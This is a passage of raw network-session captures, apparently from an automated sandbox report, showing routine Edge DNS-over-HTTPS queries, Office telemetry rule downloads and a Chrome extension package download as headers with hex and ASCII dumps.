                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8ecbf05c7a1ede98-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 16 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        26192.168.2.74973013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:22 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                        x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125322Z-1746fd949bdzd2qvhC1EWRcygw00000000wg000000009a0u
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        27192.168.2.749738172.64.41.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        28192.168.2.749736162.159.61.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        29192.168.2.749737162.159.61.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:23 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:23 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 04 62 69 6e 67 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 57 00 0c 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwbingcomA)WS
                                                                                                                                                                                                        2024-12-04 12:53:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:23 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8ecbf0661f6d8c05-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-12-04 12:53:23 UTC468INData Raw: 00 00 81 80 00 01 00 03 00 01 00 01 03 77 77 77 04 62 69 6e 67 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 54 45 00 25 07 77 77 77 2d 77 77 77 04 62 69 6e 67 03 63 6f 6d 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 2a 00 05 00 01 00 00 00 21 00 17 03 77 77 77 04 62 69 6e 67 03 63 6f 6d 07 65 64 67 65 6b 65 79 c0 4a c0 5b 00 05 00 01 00 00 54 45 00 19 06 65 38 36 33 30 33 04 64 73 63 78 0a 61 6b 61 6d 61 69 65 64 67 65 c0 4a c0 85 00 06 00 01 00 00 03 cd 00 31 06 6e 30 64 73 63 78 c0 8a 0a 68 6f 73 74 6d 61 73 74 65 72 06 61 6b 61 6d 61 69 c0 15 67 50 50 a6 00 00 03 e8 00 00 03 e8 00 00 03 e8 00 00 07 08 00 00 29 04 d0 00 00 00 00 00 f5 00 0c 00 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwbingcomATE%www-wwwbingcomtrafficmanagernet*!wwwbingcomedgekeyJ[TEe86303dscxakamaiedgeJ1n0dscxhostmasterakamaigPP)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        30192.168.2.749741142.250.181.1294437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:23 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 138356
                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4zguC1N2OoYvoWLQ0cu2RPKe8uy19z4e0qz1SHqzyWr-9u1SCFcFmkwldbkessZiknB2rBVNm9eQ
                                                                                                                                                                                                        X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                        Date: Tue, 03 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                        Expires: Wed, 03 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                        Age: 72504
                                                                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                        ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC817INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c
                                                                                                                                                                                                        Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc
                                                                                                                                                                                                        Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00
                                                                                                                                                                                                        Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5
                                                                                                                                                                                                        Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51
                                                                                                                                                                                                        Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13
                                                                                                                                                                                                        Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7
                                                                                                                                                                                                        Data Ascii: `cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73
                                                                                                                                                                                                        Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC1390INData Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00
                                                                                                                                                                                                        Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        31192.168.2.74974213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:24 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                        x-ms-request-id: 1b86d58a-f01e-0071-54ce-45431c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
